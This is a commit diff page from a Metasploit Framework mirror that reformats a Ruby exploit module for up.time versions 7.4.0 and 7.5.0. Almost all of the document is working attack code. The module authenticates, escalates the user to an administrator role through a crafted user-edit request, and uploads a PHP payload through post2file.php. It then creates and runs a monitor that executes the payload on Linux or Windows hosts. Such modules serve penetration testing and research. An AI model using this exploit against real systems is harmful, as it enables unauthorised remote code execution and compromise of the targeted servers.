infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update 

Update
bug/bundler_fix
Ewerson Guimaraes (Crash) 2015-09-03 20:29:57 +02:00
parent 252e80e793
commit 6250983fb4
1 changed files with 443 additions and 475 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

316
modules/exploits/multi/http/uptime_code_exec.rb
View File

@ -4,27 +4,24 @@
## ##
require 'msf/core' require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE include Msf::Exploit::PhpEXE
def initialize(info = {})
def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Uptime Version 7.4.0 / 7.5.0 Upload and Exec file", 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
'Description' => %q{ 'Description' => '
This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0 By This module exploits a vulnerability found in Uptime
supplying a specially crafted request is possible to upload file and execute arbitrary version 7.4.0 and 7.5.0 By supplying a specially
commands through privilege escalation. crafted request is possible to upload file and execute
arbitrary commands through privilege escalation.
}, ',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>', 'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
], ],
'References' => 'References' =>
[ [
@ -34,14 +31,14 @@ class Metasploit4 < Msf::Exploit::Remote
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 100000, # just a big enough number to fit any PHP payload 'Space' => 100_000,
'DisableNops' => true 'DisableNops' => true
}, },
'Platform' => ['php'], 'Platform' => ['php'],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], ['Automatic', {}]
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
@ -55,193 +52,183 @@ class Metasploit4 < Msf::Exploit::Remote
register_options( register_options(
[ [
Opt::RPORT(9999), Opt::RPORT(9999),
OptString.new("USERNAME", [true, 'The username to authenticate as']), OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new("PASSWORD", [true, 'The password to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class) ], self.class)
end end
################################Application Check############################## # ###############################Application Check##############################
def check def check
sig = "up.time 7.5.0" sig = 'up.time 7.5.0'
sig2 = "up.time 7.4.0" sig2 = 'up.time 7.4.0'
res = send_request_cgi({ res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => '/' 'uri' => '/')
} )
print_status("#{rhost}:#{rport} - Checking version...") print_status("#{rhost}:#{rport} - Checking version...")
if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/ if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
return Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
print_status("Trying to login...") print_status('Trying to login...')
#############################Application Login########################### # ############################Application Login###########################
res_auth = send_request_cgi({ res_auth = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'uri' => '/index.php?', 'uri' => '/index.php?',
'vars_post' => { 'vars_post' => {
'username' => datastore['USERNAME'], 'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'] 'password' => datastore['PASSWORD']
})
} # ############################Check OS #####################################
} )
#############################Check OS #####################################
if res_auth.headers['Server'] =~ /Unix/ if res_auth.headers['Server'] =~ /Unix/
print_status("Found Linux instalation - Setting appropriated PATH") print_status('Found Linux instalation - Setting appropriated PATH')
phppath = "/usr/local/uptime/apache/bin/php" phppath = '/usr/local/uptime/apache/bin/php'
uploadpath = "/usr/local/uptime/GUI/wizards" uploadpath = '/usr/local/uptime/GUI/wizards'
else else
print_status("Found Windows instalation - Setting appropriated PATH") print_status('Found Windows instalation - Setting appropriated PATH')
phppath = "C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe" phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
uploadpath = "C:\\Program Files\\uptime software\\uptime\\GUI\\wizards" uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards'
end end
########################################################################### ###########################################################################
if res_auth && res_auth.get_cookies =~ /login=true/
if res_auth and res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1)
cookie = $1 cookie_split = res_auth.get_cookies.split(';')
cookie_split = res_auth.get_cookies.split(";")
print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good("Login success") print_good('Login success')
# #####################Privilege escalation getting user ID#################
######################Privilege escalation getting user ID################# res_priv = send_request_cgi(
res_priv = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => '/main.php', 'uri' => '/main.php',
'vars_get' => { 'vars_get' =>
{
'page' => 'Users', 'page' => 'Users',
'subPage' => 'UserContainer' 'subPage' => 'UserContainer'
}, },
'headers' => { 'headers' =>
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', {
'Cache-Control'=> 'max-age=0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
} })
matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
get_id = matchdata[0].gsub(/[^\d]/, '')
print_status('Escalating privileges...')
} # #####################Privilege escalation post####################################
) res_priv_elev = send_request_cgi(
matchdata=res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
get_id= matchdata[0].gsub(/[^\d]/, '')
print_status("Escalating privileges...")
######################Privilege escalation post####################################
res_priv_elev = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => '/main.php', 'uri' => '/main.php',
'vars_get' => { 'vars_get' =>
{
'section' => 'UserContainer', 'section' => 'UserContainer',
'subsection' => 'edit', 'subsection' => 'edit',
'id' => "#{get_id}" 'id' => "#{get_id}"
}, },
'headers' => { 'headers' =>
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', {
'Cache-Control'=> 'max-age=0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
}, },
'vars_post' => { 'vars_post' =>
'operation' =>'submit', {
'disableEditOfUsernameRoleGroup' =>'false', 'operation' => 'submit',
'disableEditOfUsernameRoleGroup' => 'false',
'username' => datastore['USERNAME'], 'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'], 'password' => datastore['PASSWORD'],
'passwordConfirm' => datastore['PASSWORD'], 'passwordConfirm' => datastore['PASSWORD'],
'firstname' => rand_text_alpha(10), 'firstname' => rand_text_alpha(10),
'lastname' => rand_text_alpha(10), 'lastname' => rand_text_alpha(10),
'location' =>'', 'location' => '',
'emailaddress' =>'', 'emailaddress' => '',
'emailtimeperiodid' =>'1', 'emailtimeperiodid' => '1',
'phonenumber' =>'', 'phonenumber' => '',
'phonenumbertimeperiodid' =>'1', 'phonenumbertimeperiodid' => '1',
'windowshost' =>'', 'windowshost' => '',
'windowsworkgroup' =>'', 'windowsworkgroup' => '',
'windowspopuptimeperiodid' =>'1', 'windowspopuptimeperiodid' => '1',
'landingpage' =>'MyPortal', 'landingpage' => 'MyPortal',
'isonvacation' =>'0', 'isonvacation' => '0',
'receivealerts' =>'0', 'receivealerts' => '0',
'activexgraphs' =>'0', 'activexgraphs' => '0',
'newuser' =>'on', 'newuser' => 'on',
'newuser' =>'1', 'newuser' => '1',
'userroleid' =>'1', 'userroleid' => '1',
'usergroupid[]' =>'1' 'usergroupid[]' => '1'
} })
} ) # #################################Refresing perms.###################################################################
print_status('Refresing perms...')
##################################Refresing perms.################################################################### res_priv = send_request_cgi(
print_status("Refresing perms...")
res_priv = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => '/index.php?loggedout', 'uri' => '/index.php?loggedout',
'headers' => { 'headers' =>
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', {
'Cache-Control'=> 'max-age=0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/index.php", 'Referer' => "#{rhost}/index.php",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
} }
)
} ) res_auth = send_request_cgi(
res_auth = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => '/index.php', 'uri' => '/index.php',
'vars_post' => { 'vars_post' =>
{
'username' => datastore['USERNAME'], 'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'] 'password' => datastore['PASSWORD']
} })
} ) if res_auth && res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
if res_auth and res_auth.get_cookies =~ /login=true/ cookie_split = res_auth.get_cookies.split(';')
cookie = $1
cookie_split = res_auth.get_cookies.split(";")
print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good("Priv. Escalation success") print_good('Priv. Escalation success')
end end
##########CREATING EXEC Service################################################# # #########CREATING EXEC Service#################################################
phpfile_name = rand_text_alpha(10) phpfile_name = rand_text_alpha(10)
##########CREATING Linux EXEC Service################################################# # #########CREATING Linux EXEC Service#################################################
if res_auth.headers['Server'] =~ /Unix/ if res_auth.headers['Server'] =~ /Unix/
print_status("Creating Linux Monitor Code exec...") print_status('Creating Linux Monitor Code exec...')
res_service = send_request_cgi({ res_service = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'uri' => '/main.php', 'uri' => '/main.php',
'headers' =>{ 'headers' =>
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', {
'Cache-Control'=> 'max-age=0', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/index.php", 'Referer' => "#{rhost}/index.php",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
}, },
'vars_get' => { 'vars_get' =>
{
'section' => 'ERDCInstance', 'section' => 'ERDCInstance',
'subsection' => 'add' 'subsection' => 'add'
}, },
'vars_post' => { 'vars_post' =>
{
'initialERDCId' => '20', 'initialERDCId' => '20',
'target' => '1', 'target' => '1',
'targetType' => 'systemList', 'targetType' => 'systemList',
@ -266,7 +253,7 @@ phpfile_name = rand_text_alpha(10)
'screenOrder_[184]' => '1', 'screenOrder_[184]' => '1',
'parmType_[184]' => '1', 'parmType_[184]' => '1',
'label_[185]' => 'Arguments', 'label_[185]' => 'Arguments',
'value_[185]' => uploadpath +'/'+ phpfile_name +'.txt', 'value_[185]' => uploadpath + '/' + phpfile_name + '.txt',
'id_[185]' => 'args', 'id_[185]' => 'args',
'name_[args]' => '185', 'name_[args]' => '185',
'units_[185]' => '', 'units_[185]' => '',
@ -316,19 +303,16 @@ phpfile_name = rand_text_alpha(10)
'wizardTask' => 'pageFinish', 'wizardTask' => 'pageFinish',
'visitedPage[1]' => '1', 'visitedPage[1]' => '1',
'visitedPage[2]' => '1' 'visitedPage[2]' => '1'
})
}
} )
else else
##########CREATING Windows EXEC Service################################################# # #########CREATING Windows EXEC Service#################################################
print_status("Creating Windows Monitor Code exec...") print_status('Creating Windows Monitor Code exec...')
res_service = send_request_cgi({ res_service = send_request_cgi('method' => 'POST',
'method' => 'POST',
'uri' => '/main.php', 'uri' => '/main.php',
'headers' => { 'headers' => {
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control'=> 'max-age=0', 'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
@ -364,7 +348,7 @@ phpfile_name = rand_text_alpha(10)
'screenOrder_[184]' => '1', 'screenOrder_[184]' => '1',
'parmType_[184]' => '1', 'parmType_[184]' => '1',
'label_[185]' => 'Arguments', 'label_[185]' => 'Arguments',
'value_[185]' => "/K \"\"#{phppath}\""+" "+"\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ", 'value_[185]' => "/K \"\"#{phppath}\"" + ' ' + "\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ",
'id_[185]' => 'args', 'id_[185]' => 'args',
'name_[args]' => '185', 'name_[args]' => '185',
'units_[185]' => '', 'units_[185]' => '',
@ -414,50 +398,40 @@ phpfile_name = rand_text_alpha(10)
'wizardTask' => 'pageFinish', 'wizardTask' => 'pageFinish',
'visitedPage[1]' => '1', 'visitedPage[1]' => '1',
'visitedPage[2]' => '1' 'visitedPage[2]' => '1'
} })
} )
end end
# #######Upload file###############################################
########Upload file############################################### print_status('Uploading file...')
print_status("Uploading file...") res_upload = send_request_cgi('method' => 'POST',
res_upload = send_request_cgi({
'method' => 'POST',
'uri' => '/wizards/post2file.php', 'uri' => '/wizards/post2file.php',
'vars_post' => { 'vars_post' => {
'file_name' => phpfile_name + '.txt', 'file_name' => phpfile_name + '.txt',
'script' => payload.encoded 'script' => payload.encoded
})
} print_status('Cheking Uploaded file...')
} ) res_up_check = send_request_cgi('method' => 'GET',
'uri' => '/wizards' + '/' + phpfile_name + '.txt',
print_status("Cheking Uploaded file...")
res_up_check = send_request_cgi({
'method' => 'GET',
'uri' => '/wizards'+ '/' + phpfile_name + '.txt',
'headers' => { 'headers' => {
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control'=> 'max-age=0', 'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/index.php", 'Referer' => "#{rhost}/index.php",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
} })
} )
if res_up_check.code == 200 if res_up_check.code == 200
print_good("File found: #{phpfile_name}") print_good("File found: #{phpfile_name}")
else else
print_error("File not found") print_error('File not found')
end end
# ####Get Monitor ID##################################################################
#####Get Monitor ID################################################################## print_status('Fetching Monitor ID...')
res_mon_id = send_request_cgi('method' => 'GET',
print_status("Fetching Monitor ID...")
res_mon_id = send_request_cgi({
'method' => 'GET',
'uri' => '/ajax/jsonQuery.php', 'uri' => '/ajax/jsonQuery.php',
'vars_get' => { 'vars_get' => {
'query' => 'GET_SERVICE_PAGE_ERDC_LIST', 'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
@ -466,29 +440,25 @@ phpfile_name = rand_text_alpha(10)
'sSearch' => 'Exploit' 'sSearch' => 'Exploit'
}, },
'headers' => { 'headers' => {
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control'=> 'max-age=0', 'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
'Referer' => "#{rhost}/index.php", 'Referer' => "#{rhost}/index.php",
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
} })
matchdata = res_mon_id.body.match(/id=?[^>]*>/)
} ) mon_get_id = matchdata[0].gsub(/[^\d]/, '')
matchdata=res_mon_id.body.match(/id=?[^>]*>/)
mon_get_id= matchdata[0].gsub(/[^\d]/, '')
print_good("Monitor id aquired:#{mon_get_id}") print_good("Monitor id aquired:#{mon_get_id}")
####Executing monitor#################################################################### # ###Executing monitor####################################################################
res_exec_mon = send_request_cgi({ res_exec_mon = send_request_cgi('method' => 'POST',
'method' => 'POST',
'uri' => '/main.php', 'uri' => '/main.php',
'headers' => { 'headers' => {
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control'=> 'max-age=0', 'Cache-Control' => 'max-age=0',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'Host' => "#{rhost}", 'Host' => "#{rhost}",
@ -501,13 +471,11 @@ phpfile_name = rand_text_alpha(10)
'id' => mon_get_id, 'id' => mon_get_id,
'name' => 'Exploit' 'name' => 'Exploit'
} })
} ) ######################################################################################
######################################################################################
else else
print_error("#{rhost}:#{rport} - Cookie not found") print_error("#{rhost}:#{rport} - Cookie not found")
return nil return nil
end end
end
end
end end